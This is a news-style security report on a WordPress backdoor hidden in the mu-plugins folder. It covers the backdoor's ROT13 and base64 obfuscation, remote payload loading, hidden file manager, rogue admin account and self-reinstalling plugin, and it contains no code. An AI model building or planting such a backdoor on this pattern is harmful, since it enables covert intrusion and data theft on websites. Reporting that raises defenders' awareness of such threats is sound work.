New York, NY – A sophisticated and stealthy backdoor has been unearthed lurking within the WordPress mu-plugins folder, granting malicious actors persistent and virtually undetectable access to compromised websites. This discovery, detailed by Sucuri researchers, sheds light on a highly dangerous threat designed to evade detection and maintain full administrative control over infected sites.
The Anatomy of an Evasive Threat
At the heart of this new exploit lies a malicious PHP file, deceptively named “wp-index.php.” Far from being a legitimate WordPress component, this file functions as a cunning loader. Its primary role is to fetch a highly obfuscated payload, which it then strategically stores within the WordPress database. This design choice is crucial for its stealth, allowing the core malicious code to reside in a less obvious location, making detection more challenging for site administrators.
Cloaked in Obfuscation: How the Backdoor Hides in Plain Sight
The backdoor employs clever techniques to obscure its true nature. Researchers found that it utilizes ROT13, a simple substitution cipher, for basic obfuscation. This initial layer of disguise is then followed by a more complex maneuver: the decoding of a ROT13-encoded URL. From this URL, a base64-encoded payload is fetched and subsequently executed. This multi-layered approach to concealment ensures that the malicious code leaves minimal traces, making it difficult for standard security scans to pinpoint and analyze.
Full Control, Relentless Persistence: The Backdoor’s Capabilities
Once active, the backdoor grants attackers an alarming level of control over the compromised website. It comes equipped with a hidden file manager, allowing cybercriminals to browse, modify, and exfiltrate sensitive data directly from the server. Furthermore, it automatically creates a new administrative user, ensuring that even if legitimate admin accounts are secured, the attackers retain a backdoor into the system. What makes this threat particularly formidable is its dedication to persistence: the malware force-installs a malicious plugin. This plugin acts as a self-healing mechanism, designed to restore the backdoor if any attempt is made to remove it. To further solidify their access, the attackers can also change the passwords of common admin usernames to a default, attacker-set value, guaranteeing continued unauthorized entry.
A Growing Risk: Implications for Website Security
The discovery of this stealthy WordPress backdoor emphasizes the evolving and increasingly sophisticated nature of web threats. A compromised website is not merely a static target; it can be leveraged for a myriad of illicit activities, including broader attacks against other systems, phishing campaigns, or serving as a host for further malware distribution. The ability of this particular backdoor to evade detection, reinstall itself, and facilitate remote command execution makes it a significant and persistent danger that web administrators must be acutely aware of.